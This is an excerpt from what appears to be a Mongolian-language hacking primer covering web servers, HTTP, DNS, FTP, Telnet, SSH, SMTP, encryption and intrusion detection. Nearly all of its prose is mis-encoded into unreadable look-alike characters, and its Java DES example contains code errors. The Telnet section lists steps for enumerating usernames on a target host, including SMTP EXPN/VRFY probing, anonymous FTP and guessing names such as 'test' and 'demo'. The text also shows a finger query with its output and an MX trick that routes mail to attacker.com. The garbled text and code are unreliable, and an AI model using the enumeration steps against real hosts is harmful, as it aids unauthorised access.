!nformation Server uap kM. XapaMcan:aü us sMap u aaô cepaep xanaax
ôonoxyüu onou uvx:aü ôaüaar.
2006 oub 10 capbu ôaüanaap 970,932,447 naaax:aü cepaep ôaüua
racau cyaanraa rapuaa, aua us eMuex capbuxaac 1,08 casap uaMaracau
ôaüua vsvvnan: kM ôaüua. Ans cepaep xaMrnüu nx amnrnaraax ôaüraar
xapsuyynx xap¡s.
Baô cepaepnüu eueeapnüu npoôneM ôon :vvunü onou susbu
vünunnraa vsvvnaar uaaaap:aü xonôoo:oü, vvunür aaraaa :vvua uaa:pax
ôonoMx us euaepcaer. Baô cepaep: uaa:pax apx us aurnnaracau ôaüaar.
Cepaepnür amnrnaxaa :oxnpoMx:oü acaxnür manraaar, Meu :vvuunau
sus ôvpnüu counpxon:oü Maaaanan ôyky daün apaar Mam onou xaparcan
ôaüaar. Tvvunü uar us Whisker kM. Whisker-nüu xaMrnüu cvvnnüu
xyannôap ôon 1.+ xyannôap kM. Whisker ôon aaô cepaepnüu yxaanar
manran: xnüaar PERL xan aaap ônunracau koa kM. Whisker-nüu xaMrnüu
uyxan ouunor ôon :ap aMapxau raM:aar "database" xaparnaaar.
Annnnkeümu cepaep (applicat ion server) us xaparnaruaaa ererannür
eep aaapaa ôonoacpyynx xapyynax sopnnro:oü. Xnmaa us: PHP us
Apache cepaep aaap, ASP.NET us !!S cepaep aaap axnnnaua. 3ua knôep
raM: xaprnüu /0¾-nür aaô annnnkeümu xanaan: asanarnür auxaapax
xapar:aü.
26
Orerannüu cau us sus ôvpnüu ererannür eep aaapaa xaaranax
sopnnro:oü ôaüaar. NySOL, Oracle, NS-SOL rax Ma: ôaüaar.
Baô xyyacbr vsax ôaüraa :anbr knneu: (client) raaar. Cepaep ôon
aaônür vsvvnx ôaüraa :an kM. Neu aaô xyyacbr ônucau xan ôyky
ckpnn:nür ao:op us knneu: :an ôa cepaep :an rax xoëp xyaaaaar.
Knneu: :anbu ckpnn: ôon aaô vsax ôaüraa koMnsk:ep aaapaa myya
ôonoacpyynaraaar. Yvunü xnmaa us: JavaScript, vBScript, Active X kM.
Xapnu cepaep :anbu ckpnn: ôon aaô cepaep koMnsk:ep aaapaa koa us
ôonoacpyynaraaaa vp avur us xaparnaruna nnraaaar. Xnmaa us: Perl, ASP
(Active Server Pages), PHP, ColdFusion, JSP(Java Server Pages) rax Ma:.
XaMrnüu cvvnnüu venüu aua cyaanraaub vp avur xapaaa xvu ôonrou
raüxax ôaüraa ôaüx, ra:an ôac aua cyaanraar xnücau xvMvvc ôac aua vp
avuraa xapaaa ônauaac ay:yyrvü raüxcau ôaüua. Bna eMue us PHP aaap
xnüracau aaô xyyaac xaMrnüu onou rax ôoaaor ôaücau ônnaa. Faau oaoo
:nüM ônm ôonxaa. ºaraaa nüM vp avua xvpcunür uapnüaunau cyanaaa
vsaxaa xyanüu aaô caü:yya ronayy PHP aaap ônunracau ôaüraa ôon, :oM
xnxnr onou ôaüryynnaryyabu caü: ronayy ASP :exuonornür amnrnacau
ôaüua. ºnaurysa cvvnnüu vea ASP.NET-nüu xaparnaa xypaau:aüraap
ecex ôaüraar xapx ôonuo. ºnaurysa onou xaparnaru:aü :oM :oM caü:yya
27
ôvra ASPX epre:ren:aü ôaüraar :a ausaapcau ôaüx. Naraarvü aua ecen:
ASP.NET-nüu xaMraanan: caüu ôaüraa:aü xonôoo:oü ôaüx.
3xnaaa aaô xyyaac sax axnnnaaar npoueccbr aau vsse. Baô cnc:eM
us aaô xaparnaru (web browser), aaô cepaep, onou annnnkeümuyyabr
axnyynax annnnkeümu cepaep, ererannüu caurnüu cepaep rax aepaeu
ôvpanaaxvvuaac :or:ouo. Bapaax sypraac xapxau xoopouaoo soxnuox
axnnnaarnür us xapx ôonuo.
URL us aaô annnnkeümu:aü xapnnuau axnnnaxaaa aaô cepaep
xaparnarunüu koMnsk:ep xoëpbu xoopoua aapaax xanôap:aüraap
aaMxyynaar. OMuex sypar:aü URL-aa xapsuyynx xap¡s.
http:]] cepaep ] saM ] annnaxeãma ? xyabcaruyyp
28
Baô cepaep aux cyynraxaa nxaux nop: us uaan::aü ôaüaar ôonoxoop
:vvunür mvvpau mauara:aü svüpnax us u ônü. HüMa ron xaparnaaar
nop:ooc ôycabr ôvranür xaaaar. Faxaaa n :ap uaan::aü xaaxau nop:oop
us Xakepyya uaa:apu uaaaar: ron yunp us ôaüraa kM.
Baô cepaep: auxuaac us cekyuaaa uar I P xasruaac xaaau xvcan: aaaa
:an us npx ôonoxbr :oxnpyynx eraer. 2 - 60000 xvp:an ôaüx ôonox
ôonoau auxaaru y:raapaa 500 - 1000 n ôaüaar.
Cepaep overload (xa: auaanaraax, rauax) ôonox xaa xaaau :oxnonaon
ôaüaar. Bna sapnMaaa aaô vsax ôaüxaa 500, 502, 503, 50+ anaaauyya
nnapaar, aua ôon Overload ôoncuooc vvaax rapaar.
- Xyrauaaub uar armnua Mam onou xvu uarau sapar :yxaüu aaônür
vsax. ( 1000 - 1 cas)
- DDoS aaüpan:bu vea
- Worm ( e:) xa: nx bandwith naaan
- Hu:epua: xonôon: Myy ôaüaan
- HporpaMbu ôonou :exunknüu mnuaunan: xnüxaaa anaaa raprax
sapar ôonuo.
Overload-a opoxrvüu :yna:
- Firewall-aa caüu :oxnpyynax xapar:aü
- HTTP t raffic manager cyynrax mnüaax ôac ôonuo.
- Bsõ õpaysep -
Baô ôpaysep (web browser) us nu:epua:aap asnax ôonoMxnür ônaaua
onroaor. URL aaap eepnüu vsaxnür xvccau aaônüuxaa xasrnür ônunxaa
ôpaysep aaô cepaep: vsax xvcan: :aanua. Xapaa :yxaüu xyyaac ôaüaan
aaô cepaep :vvunür ôpaysep nvv nnraaua. Baô vsaxaa ununü :yxaü ôvx
Maaaannnür cepaep nvv nnraaaar. Yvua I P xasr, aaô ôpaysepbu
aanrapaurvü Maaaanan, eMue opcou acax Maaaannvva (cookie) rax Ma:.
I nt ernet Explorer, Mozilla Firefox, Opera, Net scape rax Ma: :a ônaunü
eaep :y:aM xaparnaaar aaô ôpaysepyya ôaüaar. 3araapnüu xaparnaar us
xapsuyynôan:
I nt ernet Explorer - 84,03 %
Firefox - 10,7%
Safari - 3,.25 %
Net scape - 0,98 %
Opera - 0,57%
29
- Fi r ewal l -
Xvu ôonrou xvccau veaaa koMnsk:ep nvv unus uaa:apu uaaaar ôon
aaüpan: xnüxaa Mam aMapxau ôaüx ôonuo. TnüMaac raauaac xauaax
ôonoMxnür xssraapnax erex xapar:aü ôaüaar. Yvunür rvüua:raaar svün
ôon Fan: xaua (Firewall) xaMaax nporpaM kM. 3ua us sus ôvpnüu raaub
uaa:pan:vvanür xaaaar.
Fan: xaua us raaaaa ôa ao:ooa racau 2 :epen ôaüaar. Faaaaa raaar
us :ouor :exeepeMxnüu :vamnua spnraax ôaüraa ôereea router rax ôna
uapnaaar :exeepeMx us ao:poo ran: xaubr aryyncau ôaüaar.
Bo:ooa raaar us nporpaMbu :vamnua spnraax ôaüraa ôonuo. 3apnM
vünannüu cnc:eM eep:ee ran: xaubr aryyncau ôaüaar. Xapaa :aub
vünannüu cnc:eMa aua nporpaM cyyraarvü ôaüaan :a xyanüu ran: xaubu
nporpaMbr onx aau cyynraapaü.
- HTTP -
3urnüuaap xanôan Hypertext Transfer Protocol us ônaunü aaô vsaxaa
amnrnaaar npo:okon kM. Ta ôna aaô xyyaac vsaxaaa axnaaa aaô vsaru
nporpaM (!nternet Explorer rax Ma:) aaapaa ht t p: / / www.hacker.mn rax
ônuaarnür cauax ôaüraa ôaüx. 3ua us HTTP npo:okonbr amnrnaxaa saax
eru ôaüua racau vr. Xapaa FTP npo:okon amnrnax ôon ftp://ftp.hacker.mn
rax saax erue.
HTTP xvcan: (request) us aapaax xanôap:aü ôaüua.
GET / images/ logo.gif HTTP/ 1.1 - I mages donaepooc logo syprnür
vsaxnür xvccau ôaüua. Bnaunü ôpaysep aaap ônucau kM, uaauaa nüM n
xanôap:aü ôaüua.
HTTP-a uaüMau :epnnüu Me:oa ôaüua. HEAD, GET, POST, PUT,
DELETE, TRACE, OPTI ONS, CONNECT rax Ma:.
Xapnu HTTP xapnyn: (response) aapaax xanôap:aü ôaüua.
HTTP/ 1.1 200 OK
Dat e: Mon, 23 May 2005 22: 38: 34 GMT
Server: Apache/ 1.3.27 ( Unix) (Red-Hat / Linux)
Last -Modified: Wed, 08 Jan 2003 23: 11: 55 GMT
Et ag: "3f 80f-1b6-3e1cb03b"
Accept -Ranges: byt es
30
Cont ent -Lengt h: 438
Connect ion: close
Cont ent -Type: t ext / ht ml; charset = UTF-8
- HTTPS -
HTTP ôon myya :ekc: xanôapaapaa aaMxnraaar, nüMaac saMaac us
Xakep ôapsx aaôan myya yumnraax ôonoMx:oü. HüMa Maaaannnür
xaMraanan::aü aaMxyynax saünmrvü maapanara rapu npua. HTTPS ôon
Secure Socker Layer ( SSL) ôa HTTP xoëpbu xaM:apcau vün axnnnaraaub
vp avuraap aaapx acyyanbr mnüaaar. ºus ôvpnüu caü: xacax saaxaaa :a
ôpaysep aaap ht t ps: / / rax rapu npaxnür ausaapcau ôaüx.
HTTPS xonôon:br xaparxvvnaxnüu :yna axnaaa AaMnunc:pa:op us
aaô cepaep aaapaa public :vnxvvp vr:aü cep:ndnka: vvcrax xapar:aü
ôaüaar. Linux aaap ôon Open SSL amnrnax vvunür xnüaar. Huracuaap
aaMxnraax ôyü Maaaanan xepavvnaraax (encrypt ) myya yumnx
ôonoMxrvü ôonuo. ºnaurysa kpean: kap:bu ayraap rax Maaaanan
aaMxnraax ôaüraa vea aua us Mam uyxan.
- IP xasr -
!nternet Protocol raaar us cvnxaaua xonôoo:oü ôaüraa ôvx
koMnsk:ep ôonou :vvu:aü aann:rax svüncnür xoopoua us snrax
sopnynan::aü rax oünrox ôonuo. I P xasrnür anuaMnk ôa c:a:nk rax
xoëp aurnnua. BnuaMnk us Dial-up rax Ma: xonôon:oop opaor ôon
:yxaüu nu:epua:nüu vünunnraa vsvvnaru koMnaunac (!SP) aa:oMa:aap
onroraouo. Dynamic Host Configurat ion Prot ocol (DHCP) anuaMnkaap
vvunür xonôouo. Xapaa c:a:nk I P xasr:aü ôon DHCP-a :oxnpyynx erue.
Oaooroop I P-nüu + aax xyannôapbr amnrnax ôaüraa ôereea yaaxrvü
I Pv6 rapax ôonuo. I Pv4 us ayycax ôonoxoop xaMxaaua xvpaaa ôaücau
ôon oaoo cauaa soaox svünrvü ôonxaa.
31
I Pv4 us 4,294,967,296 (2
32
) mnpxar ôaüx ôonoMx:oü ôaücau ôon !Pv6
us 340,282,366,920,938,463,463,374,607,431,768,211,456 (2
128
) mnpxar
ôaüx ôonoMx:oü kM.
!P xasr Maaus uaauaa ôon 3232238858 nüM :oo ôaüaar. Yvunür
xapaaa :a !P xasr ônm ôaüua rax xanx Maraarvü kM. Yvunür xepavvnôan
aapaax !P xasr 192.168.13.10 rapu npua. ºax xepavvnarnür xap¡s n
aaa.
192 = 11000000
168 = 10101000
13 = 00001101
10 = 00001010
32 ôn: :oo ôaüraa ôns 11000000101010000000110100001010.
3ua :oor myya apaa:bu :oonon pyy xepavvnôan 3232238858 rapu npx
ôaüraa kM. Xapaa ht t p: / / 3232238858 nurax opyynôan ununü ôpaysep
192.168.12.10 pyy xvprax ôonuo.
- DNS -
Domain Name Syst em us cvnxaau aax !P xasryyabr xaparnaruaaa
xaparnaxaa aMap ôonrox erex vvpar:aü. Xnmaanôan xvu ôonrou
6/.+3.2.2+9 rax Ma: onou :oouyyabr uaaxnnx uaaaxrvü :yn xaparnaxaa
aMap ôonrox vvauaac !P xasrnür www.hacker.mn rax Ma: vr ôonrox
xapransyynaar.
BoMaüu uapnür aapaax :vamnua xyaaaaar. Yvua:
1. Top Level Domains ( TLD) . Xnmaa us: http://www.hacker.com
1980-aaa ouooc .net, .org, .edu, .gov, .mil, .int aoMaüuyya rapu
npcau ôereea seaxeu .com, .net, .org aoMaüubr xyaanaaanx
ôonaor ôa ôycabr us seaxeu sopnynan:aap us amnrnax
:oxnonaona seameepen onroaor. 2001 ouooc .info, .biz, .name,
.pro aoMaüuyya rapu npcau.
2. Second Level Domains. Xnmaa us: http://www.hacker .com -
Toauxouaoo ôon ônaunü xyaanaax aau ôonaor aoMaüuyya kM.
3. Third Level Domains. Xnmaa us: http://hacki ng.hacker.com -
Bnaunü xanx saumcauaap ôon Subdomain kM. Xapaaa Second
Level Domain-:aü ôon xoc:oocoo xaMaapu Subdomain-r
xssraaprvü uaax xaparnax ôonaor.
32
4. Country Code Top Level Domain (ccTLD). Xnmaa us:
ht t p: / / www.hacker.mn - Tycraap :or:uocou ync ôonroua eepnüu
racau aoMaüu uap ôaüaar ôereea Nouron yncbu xyasa ôon .mn
kM. 3apnM yncbu aoMaüubr Top Level Domain Masraap
amnrnaaar.
DNS ôon ôycabu koMnsk:ep: uyyuaap uaa:pax uexuena xaMrnüu
ay:yy vuanaracau vünunnraaunü uar kM. DNS ôon xaMrnüu uaaan:aü us
kM. 3eaxeu DNS-nür xyypcuaap ky xnüx ôonoxbr xapuraas. Bn vün
axnnnaraaub :anôapbu auxaaru DNS cepaepnüu ôvpau xsuan:br xnüx
ôaüua rax vsse. 3ua xnmaaua vün axnnnaraaub :anôapbu uarnür
hacker.mn rax vsse. hacker.mn xoëp NX ônunar:aü, uar us pri 10-
hacker.com rax ueree us pri 20-cracker.mn rax :aMaarnaracau ôaüua. Bn
pri 5 aaap eep uar NX ônunar opyyncau :araaa :vvunür attacker.com pyy
saacau rax vsse. Yvunü vp avua ky ôonox aa? hacker.com-a nnraacau
ôvx Maün attacker.com aaap nop: 25 pyy asnax ôonuo. attacker.com
aaap :vvunür uenee: uaraap yumnx ôonuo, :araaa aaxnaa NX 10-pyy
unrnvvnua. Fa:an xnuxaua asaa vvunür Maaaxrvü ôaüx ôonuo.
- TCP -
Transmission Cont rol Prot ocol us nu:epua: aax ron xaparnaraaar
npo:okon kM. TCP us daün aaMxyynax ôonou raaaaa vünunnraauvvanür
uaüaaap:aü aaMxyynan:bu apraap rvüua:raua. 3ua uaüaaap:aü
aaMxyynan: raaar us ereraen sMap aac aapaanan:aü rapcau :vvraapaa
npaxnür xanx ôaüraa ôereea Meu nnraaracau ererannüu ônok ôvpa :oou
y:ra xapransyynx aMxnn::aü aaMxnracaubr Maaaraaua. TCP us OSI
Moaennüu t ransport xacar: ôaüua.
TCP ereraen aaMxyynaxaaa aapaax rypaau anxMbr aaMxnua.
1. Xonôon: vvcraua.
2. Oreraen aaMxyynua.
3. Xonôon:br sorcoouo.
- FTP -
File Transfer Protocol us ererannür :vprau myypxaü uaüaaap:aü
aaMxyynaru kM. Yvunür amnrnax FTP cepaepaac daün :a:ax acaan daün
33
FTP cepaep nvv xyynax npoueccbr rvüua:raua. FTP us 20, 21 nop:br
amnrnaaar.
FTP-aap daün aaMxyynx ôaüxaa sniffer ôapsx aaax ôonoMx:oü
yupaac SFTP ( SSH File Transfer Prot ocol), FTPS ( FTP SSL) -nür amnrnaaar.
FTP amnrnax daün aaMxyynaxbu :yna :ycraü cut uFTP Ma: nporpaM
amnrnax ôonuo. 3caan nu:epua: ôpaysep aaapaa aapaax ôaüanaap
ônunx opx ôonuo.
ft p(s) ://< login> :< password> @< ft pserveraddress> : < port >
- Tenae1 -
Tenue: npo:okonbu sopnnro us uanaaa epeuxnü, xoëp unrnana
yanpanara:aü. Tvvunü ron cauaa us :epMnuan vuaac:aü npoueccyyabu
xoopoua aaxs nu:epdeücnüu c:auaap:br ônü ôonrox saaan kM. Tenue:
us eep koMnsk:ep nvv uaa:paxaac raaua :vvu aaap vünaan xnüx
ôonoMxnür onrouo.
Haan::aü rax ôoaoxoa xaMrnüu nx euapeep vuanaraax nop: ôon
Tenue: nop: kM. Haan::aü Tenue: nop: us nxaaunau UN!X aryynaru
ôyky unrnvvnarunür saaaar. 3apnMaaa AS+00 ôyky epanüu xaMxaa:aü
koMnsk:ep onaox ôonuo. Bna saraaa uaan::aü Tenue: nop:br counpxox
ôaüua aa? raaan xoëp man:raau ôaüua. Haravraap:: aryynaru us soxnx
ëcoop xaMraanaraaarvü naanaxaa MaapaM:rnü ereranvvanür aryynx
ôonuo. Xoëp aaxs man:raau us UN!X aryynaru us xnücaap ¨relaunch"
:anôaü kM. Bn vvraap ky rax rax ôaüua aa? raaan :a ôvxau toolbox-oo
:onroü koMnsk:ep: auaanx ôonuo. 3ua us :a nxaaunau aua :onroü
koMnsk:epaac unrnaraaarvü ôyky firewalled aryynaruna uaa:pax
uaaaap:aü ôaüua racau vr. Ta toolbox-oo auaanx uaaaxrvü u racau :a
unrnvvnaruaac acaan UN!X :onroü koMnsk:epaac eep (ao:ooa) :onroü
koMnsk:ep: :enue:nax uaaaap:aü ôaüua. Bna shell-nür (acaan
unrnvvnaru prompt) sax onx aaax aa? Hxaaunau xaparnarunüu uap ôa
uyyu vr maapaaraaar. 3apnM :oxnonaona seaxeu xaparnarunüu uap
maapaaraaar. Neu sapnM :oxnonaona Cisco unrnvvnarunüu xyasa seaxeu
uyyu vr maapaaraaar. Toapyynôan ônaaua xoëp ôyky :vvuaac ôara
¨svün" xapar:aü, :ap us xaparnarunüu uap acaan uyyu vr. Bna aua xoëp
svünnür sax onox aa? Xaparnarunüu uapnür onox xaaau apra ônü:
34
1. 3apnM unrnvvnaru ôa UN!X aryynaru us :a uap: uyyu vr
opyynaarvü ôaücau u racau ôypyy xaparnarunüu uap opyyncubr
xanua.
2. Hop: 25-pyy :enue: xnü, :araaa EXPN ôa vRFY koMauabr erexnür
oponaooa vs. EXPN-a epre:ren acaan abuse, info, list, all rax Ma:
xarcaan: xnüx rax vs. Hxaux :oxnonaona aaraap us xaparnarunüu
uapnür xvunu:aü ôonroxbr saaaar.
3. Aryynaru aaap xaparnarunür courooa vs. Bna aua ôapnM: ônunr:
xoxnM us courox aprbu :anaap vsax ôonuo.
4. Haprvü FTP-r oponaooa vs, :araaa uyyu vrnür on r.M. Xaanüraap
:ap us xanxnaracau ôaüx ôonoau xvunu:aü xaparnarunüu uapnür
nnpvvnx ôonuo.
5. Baüxrvü xaparnarunüu uapnür xaparna. www. aaap ôaüxrvü
xaparnaru ôa uyyu vrunü caüxau xarcaan:br onx ôonuo.
6. ¨test", ¨demo", ¨test01" sapar unü:nar xaparnarunüu uapnür
opyynaaa vs.
7. Aryynarunüu uapnür acaan aryynarunüu uapuaac xaparnarunüu
uap ôonou vvccau uapnür xaparna.
8. Aryynaru aaô cepaep xnüx ôaüua yy rax vs, :araaa aaô xyyacbr
xap. Ta xvnaax ôaücuaacaa nnvv nxnür cypcau ôaüx ëc:oü,
“ Cont act" racau xacrnür vs :araaa :a sapnM xaparnarunüu uapnür
onx uaaax us yy vs. Baô xyyacbr vscauaap :aua xaparnarunüu
unü:nar uapnür onoxoa :ycanx Maraarvü.
3a nuraaa oaoo :a ôvxau ôaüx ôonox xaparnarunüu unnaaa yp:
xarcaan::aü ôonnoo. 3araap xaparnaruna ôaüraa acaxnür ôa:nax
xapar:aü. Xapaa ôna xaparnaruna xvunu:aü ôaüua raarnür ôa:anx
uaaaxrvü ôon ôna :vvunür :enue:nüu npo:okonoop manrax xapar:aü
ôonuo. Bnaaua ôac n uyyu vr xapar:aü. XapaMcan:aü us uyyu vrnür
ôa:nax xsnôap ôyc ôaüaar, :a uap vvunür rapaap manrax xapar:aü
ôonuo.
- Encrypt i on -
Encryption us auxub Maaaannnür xyanprax ôa vvunür us aurnüu ôyky
uaaap Maaaanan raaar, xyanpcau Maaaannnür undpau ôyky koanoracou
Maaaanan rax ôa aaraap us myya yumnx ôonoMxrvü ôaüaar. Xyanpcau
35
Maaaannnür us Fpeknüu kryptos raaar vruaac rapan:aü crypt ogram raaar
vraap uapnaaar.
Xapaa encrypt ion us saxnaan nnraacunü aapaa aua us asauaaa xvpcau
ôaüaan acpar vünaan (decrypt ion) ôonox undpau Maaaanan us ôyuaaa
aurnüu Maaaananaaa ôyuaar ôaüua.
Naaaannnüu xyanpran:bu sMap ôaüxaac man:raanau encrypt ion-b
xnüx vünaan ôonou avpaM us aMapxau acaan koMnnekc ôaüxbr
:oaopxoünaor ôaüua. Hxaux encryption-b vünanvva us xsnôapxau
Ma:eMa:nk vünanvva ôaüaar. Neu :vnxvvp rax uapnaraaar uyyunaraMan
koayyabr xaparnaaar ôaüua. Tvnxvvp us sMap uarau uyyu vr:aü ôaüx ôa
Maaaannnür nnraacau xvMvvc n Maaaar. Huracuaap encryption us
aa:oMa:aap koabr yumnx :ausaar ôonuo.
Epanüu koayya:aü aann :aub :vnxvvp vr :aus myya Maaaannnür
eraerrvü. Xapnu opoua us :oaopxoü avpMaap Maaaannnür xyanpraaar
ôaüua. Tvnxvvp vraap uyyunaracau Maaaanan us xyanpu Maaaanan ôonaor
ôon xapnu :vnxvvp vrrvüraap Maaaanan us :aünaraaxrvü.
XaMrnüu uyxan us encryption-b xvu us sMap u svünaap :aünx, aaaax
uaaaxrvü ôereea xapnu uar xyrauaaub xyasa xooxou yaaau ôaüaar.
3axnaan us aaaaraax ôonox ôonoau vvunür seaxeu cynep koMnsk:epyya
n aaaax uaaaar yunp nnvv uaüaaap:aü ôaüaar.
Hyyunan
Encryption us uyyunanbr xaaranaxaaa Mam caüu. Xau uarau :aub
koMnsk:ep acaan cvnxaaua :aus uaa:apu Maaaannnür unus xynraünx
uaanaa raxaa Maaaanan :aus ky ôaüua aa raarnür u Maaax uaaaxrvü kM.
Hapnüu soxnou ôaüryynan:
Encryption us Meu Maaaannnüu uapnüu usr: usMôaü ôaüanbu :an
aaap caüu ôaüaar. Naaaannaa uyyunaraMan ôaünraxaa encryption-b
avpMvva Mam nx euaep au xonôoraon:oü. Uaprnüu, cauxvvrnüu sapar
onou uyyunaraMan Maaaannvva us euaep soxnou ôaüryynan:br maapaaar
Maaaannvva ôereea aua ôvranür encryption-a uaüaax ôonuo.
Boan: ôaüaan
Neu encryption us :aub Maaaannnür ôoan:oü, vuau ôaüanbr xaurax
ôereea vvunür xaparnax vscau xvMvvc uo:onaor kM. Taua Maaaannnüu
xooxou u racau xacrnür xau sayyncau raarnür us :oapyynx erareepee
raüxan:aü. 3ua us cauxvvrnüu ôonou xyynnüu canôapbuxaua Mam uyxan
kM.
36
N3O 5-p syyua Cnap:akyya Mam counpxon:oü undpnüu eepunen:nüu
aprbr xaparnax ôaüxaa. Henonouuecnaub venüu aaüua Cnap:akbu
yanpaaruna yp: uapnüxau uyc ôoncou anrau uaacbr xaparnaaar ôaücau
ôereea vvunüraa :aurapnüu vnrap raaar ôaüx. 3uaxvv saxnaub y:rbr
raruxvv Cnap:akbu ônunr vcrnüu xvMvvc n :aünx yumnx uaaaar ôaücau
ôaüua. Encryption-ua xoëp :epnnüu undp ôaüaar.
Undpnüu eepunen: - Bn:nüu :or:cou xaMxaa, ôycaa mnuxvva Meu
xaaracau Maaaannnür aaxnu eepunex.
Undpnüu opnyynan: - Haaax:aü ôyü ôn:vva, mnux, Meu xaaracau
Maaaannnür opnyynax.
Nam aurnüu undpnüu eepunen: ôonou auxub :ekc:nür xonscou rax
oünrox ôonuo. 3ua ôyü ôvx undp, auxub :ekc:vva us xonnnacou ôaüaar.
Neu Mam aurnüu undpnüu opnyynan:, auxub :ekc:nüu vcrvva us ôycaa
vcar, :oo, acaan :aMaar:aap connraaor. HüMapxvv :epnnüu undpvva us
auxub vcrvvanüu ôaüpnan us xonnnacou ôaüaar.
Opunu venüu Cryptographic-bu cnc:eM us xoëp vuacau ka:eropna
xyaaaraaar.
Pirvate :vnxvvpnüu cnc:eM us rauuxau :vnxvvp xaparnaaar. Tap
:vnxvvp us encrypt ôonou decrypt-bu Maaaannnür amnrnaaar. Tycaaa
rauu :vnxvvp us Maaaannaa sapax ôyky xyaanaaanax xoëp :an amnrnax
ôonox ôa xapnu xoëp :an :vnxvvpaa uyyunax ëc:oü. Encryption-b
akynrvü ôaüaan us :vnxvvpaa xap uyyuancuaac n man:raanaar ôaüua.
Public :vnxvvpnüu cnc:eM us xoëp :vnxvvp amnrnaaar ôereea aua us
public ôonou private :vnxvvp. Xnmaa us: KoMnsk:epnüu cvnxaaua
xaparnaru xyanüu ôonou unü:nüu 2 :vnxvvp:aü ôaüaar. Xaparnaru private
:vnxvvpnür uyyunax ëc:oü ôereea xapnu public xyasa uaan::aü ôaüaar.
Private ôonou public :vnxvvp us xoopouaoo xonôoo:oü us rapuaarvü.
Xapaaa :a saxnanaa xyanüu uyyu vraa amnrnax xaparnaaan xvnaau aaaru
:aua public :vnxvvpaap sayynax ôonuo. Yunp us xvnaau aaaru :aub
:vnxvvpnür Maaax maapanararvü ôaüaar. Xapaa :aua saxnaan ôyuax
npaan rauuxau :a n eepnüu uyyu :vnxvvpnür amnrnax :apxvv
Maaaannnür aau uaaax kM.
37
1960-a axnau ouooc koMnsk:epnüu acyyaan, :vvunü :exuonornüu
ôonou uyyunanbu acyyanyya, xyas xvunü uyyu sapar svünc :vnxvv
spnraax axancau ôaüua. 3uaxvv c:auaap:br onou susbu sacrnüu raspbu
rapaauvva, Meu xyaanaaaub cnc:eMvvaaa amnrnaxaap xnüracau ôa
auaxvv c:auaap:br Data Encryption Standard (DES).
public St ring encrypt (St ring plainText ) {
DESKeySpec keySpec = new DESKeySpec(encrypt Key) ;
Secret KeyFact ory fact ory = new Secret KeyFact ory.get I nst ance(“ DES” );
Secret Key key = fact ory.generat eSecret (keySpec);
Cipher cipher = Cipher.get I nst ance(“ DES” );
cipher.init (Cipher.ENCRYPT_MODE,key);
byt e[ ] ut f 8t ext = plainText .get Byt es(“ UTF8” ) ;
byt e[ ] enrypt edText = ecipher.doFinal(ut f 8t ext );
ret urn Base64Encoder.encode(encrypt edText );
}
- I nt rusi on Det ect i on Syst em -
3ua koMnsk:ep ôonou koMnsk:epnüu cvnxaau aaxs sMapaaa ceper
vünanvvanür :auaax ôaüaar xaMraanan:bu cnc:eM. Xakepyyabu ôonou
anpycnüu xnüx ôyü vünanvva, :yxaünôan: Haan::aü nop: xaüxaac
caprnünax, :aaunür nnpvvnx asauaaa aoxno eru Maaaraax, caxnr ôvxnü
vünannür sorcoox uaaaap:aü cnc:eM kM. Epeuxnüa us aaüpan:br active
(naaax:aü) ôa passive ( naaaxrvü) rax xoëp xyaaaaar.
Tvvuunau aua cnc:eM us ceper axnnnaraar xoëp xyaaax vsaar.
- KoMnsk:epnüu ao:ooa cvnxaa ao:pooc ôyky ôaüryynnarbu
axnnnarcaa ayuaaac sayynx ôaüraa
- Faaaaa opunu ôyky nu:epua:aac xakepyyabu sayynx ôyü vünaan
sapraap snrax uaaaap:aü ôaüaar.
Cnc:eMnüu vuaac us Ceucop ôyky Maapvvn ôaüua. Naapvvnvva sus
ôvpnüu opon:yyabr Maaapu :vvunüraa :ea ôaas pyy sayynua Naapvvn us
vuacauaaa 3 xanôapaap Maaaannnür manrax ôaüaar:
- Harau: ceper vünaana ôvp:raracau vünannüu cau
- Cnc:eMnüu nor, koMnsk:epnüu daün cnc:eMnüu :oxnproo,
xaparnarunüu apxnüu :oxnproo rax Ma:...
- Audit t rails - ôyky vünannüu mnux ôaüaan
3ypraac ôv:unür us nnvv :oaopxoü xapx ôonuo.
38
Apxn:ek:yp ôv:unüu xyasa Teanepceu ôyky centralized (uar firewall-
aap aaMxyynau), Tapxcau ôyky Distribuited (:oM cvnxaaunü xyasa)
saraap:aü ôaüua.
- Fi nger -
Finger ôon :aub :eceencueec nnvv uexuena xaparnaraax uaaua.
Finger-:aü asnax sapnM counpxon:oü asnnbr aau vsse. ºMap uar ouunou
saacau xaparnarunüu uaprvü finger koMaua us ôvx xaparnarunür cepaep
aaap aprax auaanax ôonuo. Finger koMauabu unü:nar vp avu us aapaax
ôaüanaap xaparaaua:
> finger @196.xxx.129.66
[ 196.xxx.129.66]
Login Name Tt y I dle Login Time Of fice Office Phone
davidssh Shuaib pt s/ 1 Sep 12 17: 35 (pc22285)
root root t t y1 1d Sep 11 17: 03
Xaparnarunüu uapnür ouunou saacau finger koMaua us xaparnarunüu
:yxaü nnvv nx Maaaanan eraer.
39
- SSH –
SSH ôon :exeepeMxvvanüu xoopoua akynrvü Maaaanan aaMxyynax
UNI X-nüu koMMaua nu:epdeüc kM. 1995 oua aux SSH Secure-nür Tat u
Ylonen soxnocou. Slogin, ssh ôa scp racau rypaau ôvpanaaxvvuaac
:or:ouo. SSH us RSA xaMaax :vnxvvp vraap Maaaannnür uyyuanx
aaMxyynua.
Shell SSH-nüu default SSH install us :aubr seaxeu encrypted
xsuan:bu session-aap xauraaar. SSH-nür xaparnacunü aaayy :an us :aub
xsuan:bu session us encrypted ôaüaar kM. 3ua us sapnM xvMvvc: :aub
ky xnüx ôaüraar xapaxaa nx xauvv ôaüaar racau vr kM. Tenue:nür ônm
SSH-nür xaparnax :yxaüa eep uar :aa:aü :an us raaan SSH-nüu session
us xynraüa ep:aerrvü :an kM.
SSH us ôac SSH-nüu cyaar: ôaüraa ôycaa Maaaannnür :yuuensaaxaa
xaparnaraaar.
- SMTP -
H-Maün aaMxyynaar c:auaap: npo:okon ôereea Simple Nail Transfer
Protocol racau vrnüu :oaunon. SNTP :aubr Maaaanan uyrnyynaxaa :aua
sapnM counpxon:oü svünnür erex ôonuo.
SNTP ôac ¨bounce" Meccax nnraacuaap cvnxaaunü ao:op nporpaM
xauraMxnür nnpvvnaxaa xaparnaraax ôonuo. HüM Meccax us ôaüxrvü
xaparnaruna nnraaraaar Meccax kM. Yr n-Maün us nxaux ao:ooa n-Maün
cepaepvvanüu ôvx saMaap asnax ôereea aapaa us :aua xaparnaru
:aunraaarvü ôaüua rax Maaaraax ôonuo.
- POP3 -
